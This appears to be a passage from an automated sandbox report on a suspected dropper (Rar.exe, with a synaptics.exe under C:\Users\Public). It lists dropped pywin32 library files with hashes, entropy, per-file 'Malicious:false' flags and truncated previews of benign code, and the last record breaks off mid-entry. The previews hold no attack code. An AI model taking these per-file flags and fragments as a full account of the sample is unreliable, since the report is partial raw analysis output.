                                                                                                                                                                                                                                  Preview:""" Finds any disconnected terminal service sessions and logs them off""".import pywintypes.import win32ts.import winerror..sessions = win32ts.WTSEnumerateSessions(win32ts.WTS_CURRENT_SERVER_HANDLE).for session in sessions:. """. WTS_CONNECTSTATE_CLASS: WTSActive,WTSConnected,WTSConnectQuery,WTSShadow,WTSDisconnected,. WTSIdle,WTSListen,WTSReset,WTSDown,WTSInit. """. if session["State"] == win32ts.WTSDisconnected:. sessionid = session["SessionId"]. username = win32ts.WTSQuerySessionInformation(. win32ts.WTS_CURRENT_SERVER_HANDLE, sessionid, win32ts.WTSUserName. ). print("Logging off disconnected user:", username). try:. win32ts.WTSLogoffSession(win32ts.WTS_CURRENT_SERVER_HANDLE, sessionid, True). except pywintypes.error as e:. if e.winerror == winerror.ERROR_ACCESS_DENIED:. print("Can't kill that session:", e.strerror). else:. raise.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4317
                                                                                                                                                                                                                                  Entropy (8bit):4.4834970191394135
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:/xp0BWGNtCJT5kD166wm0ppbSKNYD4mA6drMg:/EB9tCJSDDUWDD4mA6dog
                                                                                                                                                                                                                                  MD5:FA8C4B2B1B0237E97E3633E46B2CB01C
                                                                                                                                                                                                                                  SHA1:43061EC48EF63A4A826CAF08ADD75B7E400143DD
                                                                                                                                                                                                                                  SHA-256:CAFB4C3B818FD035E620B4B78EE052637B72964CF4B307EED50439C85DDB764D
                                                                                                                                                                                                                                  SHA-512:EF119E7443E3D6A48922496109B92D0F82283BFF78957BFAF7693FB723E885CA85F8582E8AAA02A77346A10884B241AFEBCCD08BA5E89565936953062DBBAA35
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os..import win32api.import win32wnet.from winnetwk import *..possible_shares = []...def _doDumpHandle(handle, level=0):. indent = " " * level. while 1:. items = win32wnet.WNetEnumResource(handle, 0). if len(items) == 0:. break. for item in items:. try:. if item.dwDisplayType == RESOURCEDISPLAYTYPE_SHARE:. print(indent + "Have share with name:", item.lpRemoteName). possible_shares.append(item). elif item.dwDisplayType == RESOURCEDISPLAYTYPE_GENERIC:. print(. indent + "Have generic resource with name:", item.lpRemoteName. ). else:. # Try generic!. print(indent + "Enumerating " + item.lpRemoteName, end=" "). k = win32wnet.WNetOpenEnum(. RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 0, item. ).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3193
                                                                                                                                                                                                                                  Entropy (8bit):4.412241136607424
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:J5O5v49qXZog2AKXC30YbYL38ltW3bIs8poj5gWLYfykTB3A0/4eql:y50qz27CkYbYT8ltWLI7poSgEJBwiil
                                                                                                                                                                                                                                  MD5:852EC0289B940F026C47130C5914B881
                                                                                                                                                                                                                                  SHA1:C6CA600BFD5F20D0252C945DB821AA00D4C8E8E2
                                                                                                                                                                                                                                  SHA-256:7C6EB6F55940269610519A1B40FAC617905022F76907D252E0229AACA2A02794
                                                                                                                                                                                                                                  SHA-512:DD654998EEB22ACB9D1BA3A6F141116959071BDC42F87C471997C66CC83567E3F2E7B0B956922E10B8E94A49162336AD07A2624239901343D2429EB330DE5670
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Generated by h2py from d:\mssdk\include\winnetwk.h.WNNC_NET_MSNET = 0x00010000.WNNC_NET_LANMAN = 0x00020000.WNNC_NET_NETWARE = 0x00030000.WNNC_NET_VINES = 0x00040000.WNNC_NET_10NET = 0x00050000.WNNC_NET_LOCUS = 0x00060000.WNNC_NET_SUN_PC_NFS = 0x00070000.WNNC_NET_LANSTEP = 0x00080000.WNNC_NET_9TILES = 0x00090000.WNNC_NET_LANTASTIC = 0x000A0000.WNNC_NET_AS400 = 0x000B0000.WNNC_NET_FTP_NFS = 0x000C0000.WNNC_NET_PATHWORKS = 0x000D0000.WNNC_NET_LIFENET = 0x000E0000.WNNC_NET_POWERLAN = 0x000F0000.WNNC_NET_BWNFS = 0x00100000.WNNC_NET_COGENT = 0x00110000.WNNC_NET_FARALLON = 0x00120000.WNNC_NET_APPLETALK = 0x00130000.WNNC_NET_INTERGRAPH = 0x00140000.WNNC_NET_SYMFONET = 0x00150000.WNNC_NET_CLEARCASE = 0x00160000.WNNC_NET_FRONTIER = 0x00170000.WNNC_NET_BMC = 0x00180000.WNNC_NET_DCE = 0x00190000.WNNC_NET_DECORB = 0x00200000.WNNC_NET_PROTSTOR = 0x00210000.WNNC_NET_FJ_REDIR = 0x00220000.WNNC_NET_DISTINCT = 0x00230000.WNNC_NET_TWINS = 0x00240000.WNNC_NET_RDR2SAMPLE = 0x00250000.RESOURCE_CONNECTED
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7364
                                                                                                                                                                                                                                  Entropy (8bit):4.612277715258723
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:djYESt2D2KXSt7kDgt7/hJYyu8wqNP1mhr:dE1UNXSt7kDgtT9XP1mhr
                                                                                                                                                                                                                                  MD5:8E6684A1613B87B8EADBDAF4CECE9B9B
                                                                                                                                                                                                                                  SHA1:9203CB302F86AE37C239ED6826233665F2C7C979
                                                                                                                                                                                                                                  SHA-256:B1AC447688BC6BD9824ECABED1A5F1FC41E0B1161192DE8036FE9D9E41F91D96
                                                                                                                                                                                                                                  SHA-512:DA4E3572592A043C73FBB00DAA18D64DFB79994CDE4C1F120C072CB38C3B2298BDA282D933B97052A83B541789D09C464CE59E9939562F2F51584BF5426A7A4D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""".Windows Process Control..winprocess.run launches a child process and returns the exit code..Optionally, it can:. redirect stdin, stdout & stderr to files. run the command as another user. limit the process's running time. control the process window (location, size, window state, desktop).Works on Windows NT, 2000 & XP. Requires Mark Hammond's win32.extensions...This code is free for any purpose, with no warranty of any kind..-- John B. Dell'Aquila <jbd@alum.mit.edu>."""..import msvcrt.import os..import win32api.import win32con.import win32event.import win32gui.import win32process.import win32security...def logonUser(loginString):. """. Login as specified user and return handle.. loginString: 'Domain\nUser\nPassword'; for local. login use . or empty string as domain. e.g. '.\nadministrator\nsecret_password'. """. domain, user, passwd = loginString.split("\n"). return win32security.LogonUser(. user,. domain,. passwd,. w
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                                                  Entropy (8bit):5.432025330493245
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ru0gls8JSQzzAk114R2SzyVIZUf+CvwFjOrfg00y5DdJkGITzapsK/1NYvSD:Pj8T114SVI49v0jga+DYGTsK/Z
                                                                                                                                                                                                                                  MD5:DF20C86EB75661DD6FD6C8E55F809632
                                                                                                                                                                                                                                  SHA1:6AD4D8B7AA6135CA8843BA81CC896E3C92D44F5A
                                                                                                                                                                                                                                  SHA-256:B1F5894857947DCC56B2BD96BB20FEEEB5A82CA8E0B4E89A9DE0A5FD97E3C883
                                                                                                                                                                                                                                  SHA-512:880A7ED713348AA76F4BFF5AB1B8E7EDC7FFA84133531C9966D841FF9BAA1F867E1CE079EE4D68F830AE24E4349B7BA7AAA71F663E16799059E3D6DAC55248F2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Gh..Gh..Gh..N.@.Eh......Eh..S...Eh......Lh......Mh......Fh......Dh..Gh..`h......Fh......Fh......Fh..RichGh..........PE..L......d...........!.........................0...............................p............@......................... 6..`....6..d....P..t....................`..h...D1..T............................1..@............0...............................text............................... ..`.rdata..<....0......................@..@.data........@.......&..............@....rsrc...t....P.......(..............@..@.reloc..h....`.......,..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20992
                                                                                                                                                                                                                                  Entropy (8bit):5.796402902582657
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:6yclP60cRDyliPNYVPpRfGWYjlTbljBSmeP6mNFd1pbVMx8jPZWm7FWD:6Ji5y4PNsRfeblkSmN1pEaPZWm7FW
                                                                                                                                                                                                                                  MD5:2A7FAD1E3E2592F10CB7BF1AA9D373A3
                                                                                                                                                                                                                                  SHA1:C41FD641EBAEE4C84437AF863649C622881303C9
                                                                                                                                                                                                                                  SHA-256:AFA7F989C80486274B76313F92158334D09865B31719AEBAB13467007B5C878C
                                                                                                                                                                                                                                  SHA-512:3280D9C4F80A33940CE6056DEB16DC5134CAEDCBFC6B0FD2E695BB43303C7329A480F409F5165D50D7FD3C49128F2635714B7A7CC1ACA90BB0D0A90F84F5678B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........b.X`..X`..X`..Q...\`......Z`......H`......R`......Y`......Z`......Z`..L...]`..X`...`......Y`......Y`......Y`..RichX`..........................PE..L......d...........!.....(...&......I$.......@............................................@..........................M..X...8N.......p..d............................E..T...........................@F..@............@..T............................text...!&.......(.................. ..`.rdata.......@.......,..............@..@.data........`.......D..............@....rsrc...d....p.......H..............@..@.reloc...............L..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:C++ source, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30076
                                                                                                                                                                                                                                  Entropy (8bit):5.341602934640227
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:P8Bv5BnuEpBwYAmY61w/gFQ277qiF3VeYY99IqZO4AcNZHVWqu:UdHnBwYAmY61w/727xeYqIqk49HVs
                                                                                                                                                                                                                                  MD5:56FA1335CD7890A5FDD33CC47A3FB347
                                                                                                                                                                                                                                  SHA1:65DDC9821823293D434F68095240C83B819F8CDF
                                                                                                                                                                                                                                  SHA-256:BD99175F3A8A791ED5C175BF3B3D8796DB9C11D6D9FF0BBF239DEE67EEEF50C6
                                                                                                                                                                                                                                  SHA-512:6481B7F5249ACF68B48960385921CD7CD0223C369E955034F4F28566DE8169EB625800289DCFF8CB77D4BF2ADDB599B158225190EDBAB94B08FA48386F889221
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.#ifndef __PYWINTYPES_H__.#define __PYWINTYPES_H__..// If building under a GCC, tweak what we need..#if defined(__GNUC__) && defined(_POSIX_C_SOURCE).// python.h complains if _POSIX_C_SOURCE is already defined.#undef _POSIX_C_SOURCE.#endif..// windows rpc.h defines "small" as "char" which breaks Python's accu.h,.// so we undefine it before including python..#ifdef small.#undef small.#endif..#include "Python.h".#include "structmember.h".#include "windows.h"..// Helpers for our modules..// Some macros to help the pywin32 modules co-exist in py2x and py3k..// Creates and initializes local variables called 'module' and 'dict'...// Maybe these should all be removed - they existed to help in the py2->3.// transition..// On one hand: the code would be cleaner if they were all just re-inlined?.// On the other: high confidence everything uses the exact same patterns?.// (Regardless, *some*, eg, PYWIN_MODULE_INIT_RETURN_* should be re-inlined!)..// Use to define the function itself (ie, its name
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):510
                                                                                                                                                                                                                                  Entropy (8bit):5.466695229803886
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:y/KVLlUA1pAZVsrPkf0rjyl3KZX43d4AQILXyJ4hs2onBMigt0lBG8uaHKdAr4uY:C2RtWsrPJeMS4OjyJasv6OlBG8+1ztmm
                                                                                                                                                                                                                                  MD5:5851A2DE5B13DEE69EFCB9F1A284A039
                                                                                                                                                                                                                                  SHA1:1C12F79EB8F5516D10F94B0B6C90638072540E81
                                                                                                                                                                                                                                  SHA-256:90E02E7F06FDBCF8E24F4250F27BC74C65E7D9D531D05196018C341D163C5EDA
                                                                                                                                                                                                                                  SHA-512:809B9F4BDA7CC09FAC65C690BC4DBCCB9BFBEB3D9C139474EE1742C90EE1C2242B4AF5DFC2D450CE264EBBECC0873E511CFF6E20A9D2B1FDBA8A5D9FE0C9F5AE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......l..f.........................@...s....z.d.d.l.Z.W.n...e.y.......Y.d.S.w.d.d.l.Z.e.j.D.]<Z.e.j...e...rTe.e.d...r-e...e.......d.S.e.j.d.....e...sQe.j.d.....e.j.e...d...e.j.d.<.e.e.j...e.j.d.....e.j.d.<...d.S.q.d.S.)......N..add_dll_directory..PATH..).Z.pywin32_system32..ImportError..os..__path__..path..isdir..hasattrr......environ..startswith..replace..pathsep..r....r.....KC:\Users\Public\M20EKMMEH2\lib\site-packages\win32\lib\pywin32_bootstrap.py..<module>....s".....................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15094
                                                                                                                                                                                                                                  Entropy (8bit):4.777558868848426
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:p9+7gM0XJNbpbCffiskBtXvyhE+RjE5LedEIq0E1G+fe:pJNlCff8yxjE5LI4v1A
                                                                                                                                                                                                                                  MD5:370BEB77C36C0B2E840E6AB850FCE757
                                                                                                                                                                                                                                  SHA1:0A87A029CA417DAA03D22BE6EDDFDDBAC0B54D7A
                                                                                                                                                                                                                                  SHA-256:462659F2891D1D767EA4E7A32FC1DBBD05EC9FCFA9310ECDC0351B68F4C19ED5
                                                                                                                                                                                                                                  SHA-512:4E274071CA052CA0D0EF5297D61D06914F0BFB3161843B3CDCFDE5A2EA0368974FD2209732A4B00A488C84A80A5AB94AD4FD430FF1E4524C6425BAA59E4DA289
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Generated by h2py from stdin.TCS_MULTILINE = 0x0200.CBRS_ALIGN_LEFT = 0x1000.CBRS_ALIGN_TOP = 0x2000.CBRS_ALIGN_RIGHT = 0x4000.CBRS_ALIGN_BOTTOM = 0x8000.CBRS_ALIGN_ANY = 0xF000.CBRS_BORDER_LEFT = 0x0100.CBRS_BORDER_TOP = 0x0200.CBRS_BORDER_RIGHT = 0x0400.CBRS_BORDER_BOTTOM = 0x0800.CBRS_BORDER_ANY = 0x0F00.CBRS_TOOLTIPS = 0x0010.CBRS_FLYBY = 0x0020.CBRS_FLOAT_MULTI = 0x0040.CBRS_BORDER_3D = 0x0080.CBRS_HIDE_INPLACE = 0x0008.CBRS_SIZE_DYNAMIC = 0x0004.CBRS_SIZE_FIXED = 0x0002.CBRS_FLOATING = 0x0001.CBRS_GRIPPER = 0x00400000.CBRS_ORIENT_HORZ = CBRS_ALIGN_TOP | CBRS_ALIGN_BOTTOM.CBRS_ORIENT_VERT = CBRS_ALIGN_LEFT | CBRS_ALIGN_RIGHT.CBRS_ORIENT_ANY = CBRS_ORIENT_HORZ | CBRS_ORIENT_VERT.CBRS_ALL = 0xFFFF.CBRS_NOALIGN = 0x00000000.CBRS_LEFT = CBRS_ALIGN_LEFT | CBRS_BORDER_RIGHT.CBRS_TOP = CBRS_ALIGN_TOP | CBRS_BORDER_BOTTOM.CBRS_RIGHT = CBRS_ALIGN_RIGHT | CBRS_BORDER_LEFT.CBRS_BOTTOM = CBRS_ALIGN_BOTTOM | CBRS_BORDER_TOP.SBPS_NORMAL = 0x0000.SBPS_NOBORDERS = 0x0100.SBPS_POPOUT = 0x0200.SB
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):46158
                                                                                                                                                                                                                                  Entropy (8bit):5.115928989304851
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:uWtH81fEtJlkArPaYMuFRRuBa2y+A+W50QFZL34uyEY8EYlCrVicdsAQy9gX35Z5:BtH81S2UFRRuQ/+oC6ykZYZW
                                                                                                                                                                                                                                  MD5:EF5F49B57CECD42E54C4533860FB3A3A
                                                                                                                                                                                                                                  SHA1:48FDEA29160EFC44107120AE30E3E2FE00D18FDC
                                                                                                                                                                                                                                  SHA-256:0E600EB9AEDF442AFA9476E1FDB3C6D9C76B7A58114DBEC736AC0060765E7D4E
                                                                                                                                                                                                                                  SHA-512:2F3DBB1102159766DF64C517CDF45296B5AFE1F63176964156C75976CEE1C06B7C5A7B9B662F2BB86841CE5C3032881701C8552EDB7CED48FA5AC035E3E92A89
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Generated by h2py from COMMCTRL.H.WM_USER = 1024.ICC_LISTVIEW_CLASSES = 1 # listview, header.ICC_TREEVIEW_CLASSES = 2 # treeview, tooltips.ICC_BAR_CLASSES = 4 # toolbar, statusbar, trackbar, tooltips.ICC_TAB_CLASSES = 8 # tab, tooltips.ICC_UPDOWN_CLASS = 16 # updown.ICC_PROGRESS_CLASS = 32 # progress.ICC_HOTKEY_CLASS = 64 # hotkey.ICC_ANIMATE_CLASS = 128 # animate.ICC_WIN95_CLASSES = 255.ICC_DATE_CLASSES = 256 # month picker, date picker, time picker, updown.ICC_USEREX_CLASSES = 512 # comboex.ICC_COOL_CLASSES = 1024 # rebar (coolbar) control.ICC_INTERNET_CLASSES = 2048.ICC_PAGESCROLLER_CLASS = 4096 # page scroller.ICC_NATIVEFNTCTL_CLASS = 8192 # native font control.ODT_HEADER = 100.ODT_TAB = 101.ODT_LISTVIEW = 102.PY_0U = 0.NM_FIRST = PY_0U # generic to all controls.NM_LAST = PY_0U - 99.LVN_FIRST = PY_0U - 100 # listview.LVN_LAST = PY_0U - 199.HDN_FIRST = PY_0U - 300 # header.HDN_LAST = PY_0U - 399.TVN_FIRST = PY_0U - 400 # treeview.TVN_LAST = PY_0U - 499.TTN_FIRST =
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):713
                                                                                                                                                                                                                                  Entropy (8bit):4.602382429472932
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:OV5MqI03+JYspXHXPENQoSE9Xx5rX4m5AeTbTq2LaF5epDlDDDBrqXzU10Pr3Il:OVFIO+KsNMNQoS6Xx5D4XeTy8O5evDMa
                                                                                                                                                                                                                                  MD5:A17F92FB3695DC91A1B9042653DD2D0D
                                                                                                                                                                                                                                  SHA1:8DAC5D28EC5A645225741837FC9429BE04B08E26
                                                                                                                                                                                                                                  SHA-256:BE551C7BF0FCFF0736C0C8D5646F6976D22F912EA0B450CF9DF6EFF2E41F73B4
                                                                                                                                                                                                                                  SHA-512:4BEC3127FA494DD657EC02F297B9249BCD23DBC09506C3E3D0368B76EBD1FB3A0B0B5719A0420D3A204E173467FBCB6AFBB2E927E080C00010439354A057DD3F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""".Skeleton replacement for removed dbi module..Use of objects created by this module should be replaced with native Python objects..Dates are now returned as datetime.datetime objects, but will still accept PyTime.objects also..Raw data for binary fields should be passed as buffer objects for Python 2.x,.and memoryview objects in Py3k.."""..import warnings..warnings.warn(. "dbi module is obsolete, code should now use native python datetime and buffer/memoryview objects",. DeprecationWarning,.)..import datetime..dbDate = dbiDate = datetime.datetime..try:. dbRaw = dbiRaw = buffer.except NameError:. dbRaw = dbiRaw = memoryview..# type names are still exported by odbc module.from odbc import *.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30389
                                                                                                                                                                                                                                  Entropy (8bit):4.7770341275289425
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:RKDYDaTFMojf23KJIi8njbxqVQNGTe1NuNN85:S4sf23K6i8n/0VQR
                                                                                                                                                                                                                                  MD5:875D9E40BE44575D4BB3FE3967976DED
                                                                                                                                                                                                                                  SHA1:B2F4B378C918D0F6329087E6103DEC19A32793AC
                                                                                                                                                                                                                                  SHA-256:930DBD298A1A246A9D8060467E06DFB729BAFDFF0E0FE98EAD3352CFFB6F81B0
                                                                                                                                                                                                                                  SHA-512:C27055A00FFCC17D0E362F2A9D61347CED34BFFD12CDBFF1987684ED0641CC86718EB26E2E80AEE8E80BCF9394DEA85B63931EF62EF9390B2AE61A0E4A7056B7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Generated by h2py from d:/msdev/include/mmsystem.h.MAXPNAMELEN = 32.MAXERRORLENGTH = 256.MAX_JOYSTICKOEMVXDNAME = 260.MM_MICROSOFT = 1.MM_MIDI_MAPPER = 1.MM_WAVE_MAPPER = 2.MM_SNDBLST_MIDIOUT = 3.MM_SNDBLST_MIDIIN = 4.MM_SNDBLST_SYNTH = 5.MM_SNDBLST_WAVEOUT = 6.MM_SNDBLST_WAVEIN = 7.MM_ADLIB = 9.MM_MPU401_MIDIOUT = 10.MM_MPU401_MIDIIN = 11.MM_PC_JOYSTICK = 12.TIME_MS = 0x0001.TIME_SAMPLES = 0x0002.TIME_BYTES = 0x0004.TIME_SMPTE = 0x0008.TIME_MIDI = 0x0010.TIME_TICKS = 0x0020.MM_JOY1MOVE = 0x3A0.MM_JOY2MOVE = 0x3A1.MM_JOY1ZMOVE = 0x3A2.MM_JOY2ZMOVE = 0x3A3.MM_JOY1BUTTONDOWN = 0x3B5.MM_JOY2BUTTONDOWN = 0x3B6.MM_JOY1BUTTONUP = 0x3B7.MM_JOY2BUTTONUP = 0x3B8.MM_MCINOTIFY = 0x3B9.MM_WOM_OPEN = 0x3BB.MM_WOM_CLOSE = 0x3BC.MM_WOM_DONE = 0x3BD.MM_WIM_OPEN = 0x3BE.MM_WIM_CLOSE = 0x3BF.MM_WIM_DATA = 0x3C0.MM_MIM_OPEN = 0x3C1.MM_MIM_CLOSE = 0x3C2.MM_MIM_DATA = 0x3C3.MM_MIM_LONGDATA = 0x3C4.MM_MIM_ERROR = 0x3C5.MM_MIM_LONGERROR = 0x3C6.MM_MOM_OPEN = 0x3C7.MM_MOM_CLOSE = 0x3C8.MM_MOM_DONE = 0x3C9.M
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6948
                                                                                                                                                                                                                                  Entropy (8bit):5.17742075576656
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:kWxBIR46qdgb42yLuDTPhU1Wn5l2z0/LDyWnhyWACyWkhyWvgyWmyWshyWkEyWR9:kWxBIR4tpxLuDTPrkGPaWYQx
                                                                                                                                                                                                                                  MD5:D613CD1C4C09BCB74DAC2B3044AF08F2
                                                                                                                                                                                                                                  SHA1:79434FC6AEB15EA86A9CCC16225035AB23A1239A
                                                                                                                                                                                                                                  SHA-256:A56A021FC24320BEB5EC5F046E7CC758FF3A0306E3D800B0252FCF8CFE661DB3
                                                                                                                                                                                                                                  SHA-512:F00552644D534CE8E7B69E9C993BB9283FA1F3BE8BB5A3E4864F5A71CB2EF2DD0DFB700127284EA4669FD479F8560FF007DA0AD1B0EB785523A416D87E8121F5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import struct.import sys..import win32wnet..# Constants generated by h2py from nb30.h.NCBNAMSZ = 16.MAX_LANA = 254.NAME_FLAGS_MASK = 0x87.GROUP_NAME = 0x80.UNIQUE_NAME = 0x00.REGISTERING = 0x00.REGISTERED = 0x04.DEREGISTERED = 0x05.DUPLICATE = 0x06.DUPLICATE_DEREG = 0x07.LISTEN_OUTSTANDING = 0x01.CALL_PENDING = 0x02.SESSION_ESTABLISHED = 0x03.HANGUP_PENDING = 0x04.HANGUP_COMPLETE = 0x05.SESSION_ABORTED = 0x06.ALL_TRANSPORTS = "M\0\0\0".MS_NBF = "MNBF".NCBCALL = 0x10.NCBLISTEN = 0x11.NCBHANGUP = 0x12.NCBSEND = 0x14.NCBRECV = 0x15.NCBRECVANY = 0x16.NCBCHAINSEND = 0x17.NCBDGSEND = 0x20.NCBDGRECV = 0x21.NCBDGSENDBC = 0x22.NCBDGRECVBC = 0x23.NCBADDNAME = 0x30.NCBDELNAME = 0x31.NCBRESET = 0x32.NCBASTAT = 0x33.NCBSSTAT = 0x34.NCBCANCEL = 0x35.NCBADDGRNAME = 0x36.NCBENUM = 0x37.NCBUNLINK = 0x70.NCBSENDNA = 0x71.NCBCHAINSENDNA = 0x72.NCBLANSTALERT = 0x73.NCBACTION = 0x77.NCBFINDNAME = 0x78.NCBTRACE = 0x79.ASYNCH = 0x80.NRC_GOODRET = 0x00.NRC_BUFLEN = 0x01.NRC_ILLCMD = 0x03.NRC_CMDTMO = 0x05.NRC
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22344
                                                                                                                                                                                                                                  Entropy (8bit):5.171445425681835
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:36TxDCxTO5M0TX1w8DWlhhVFJwXJWKSM7NvBkYnn62jeHXBheO4ZLMGldeiDSOhu:3cpdSiNvmYnn62AXBhz4FM+deioh
                                                                                                                                                                                                                                  MD5:ACDBB2AB8B92D9CCEFBB4CCD12E6D070
                                                                                                                                                                                                                                  SHA1:FD78B196A79FB1C24299F6BBA689B0CB478EECA9
                                                                                                                                                                                                                                  SHA-256:FE53CAA6C8A2F7CA98BCAFA3427779BBCA69ED29481B4DEAA7E5FA3AA8B0E6A3
                                                                                                                                                                                                                                  SHA-512:D189AA75D396B8ADF47AE910B09A8654CC878B784A30883A075DAF9CE87628213B96038E72A1C37DE9C0EECAD21088DF864057C874C24C1F3D22317122D5D289
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Hacked from winnt.h..DELETE = 65536.READ_CONTROL = 131072.WRITE_DAC = 262144.WRITE_OWNER = 524288.SYNCHRONIZE = 1048576.STANDARD_RIGHTS_REQUIRED = 983040.STANDARD_RIGHTS_READ = READ_CONTROL.STANDARD_RIGHTS_WRITE = READ_CONTROL.STANDARD_RIGHTS_EXECUTE = READ_CONTROL.STANDARD_RIGHTS_ALL = 2031616.SPECIFIC_RIGHTS_ALL = 65535.ACCESS_SYSTEM_SECURITY = 16777216.MAXIMUM_ALLOWED = 33554432.GENERIC_READ = -2147483648.GENERIC_WRITE = 1073741824.GENERIC_EXECUTE = 536870912.GENERIC_ALL = 268435456..# file security permissions.FILE_READ_DATA = 1.FILE_LIST_DIRECTORY = 1.FILE_WRITE_DATA = 2.FILE_ADD_FILE = 2.FILE_APPEND_DATA = 4.FILE_ADD_SUBDIRECTORY = 4.FILE_CREATE_PIPE_INSTANCE = 4.FILE_READ_EA = 8.FILE_WRITE_EA = 16.FILE_EXECUTE = 32.FILE_TRAVERSE = 32.FILE_DELETE_CHILD = 64.FILE_READ_ATTRIBUTES = 128.FILE_WRITE_ATTRIBUTES = 256.FILE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 511.FILE_GENERIC_READ = (. STANDARD_RIGHTS_READ. | FILE_READ_DATA. | FILE_READ_ATTRIBUTES. | FILE_
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1283
                                                                                                                                                                                                                                  Entropy (8bit):4.661736923288396
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:++iqs0ePxlBfU3Yc3pRFN9qz7HuL2JSRhm88pFratv1oPM2j2CK2aV4bo/n2123:+7PXq3xp3N9q3HaDGFrawXyC9PE3
                                                                                                                                                                                                                                  MD5:5D28A84AA364BCD31FDB5C5213884EF7
                                                                                                                                                                                                                                  SHA1:0874DCA2AD64E2C957B0A8FD50588FB6652DD8EE
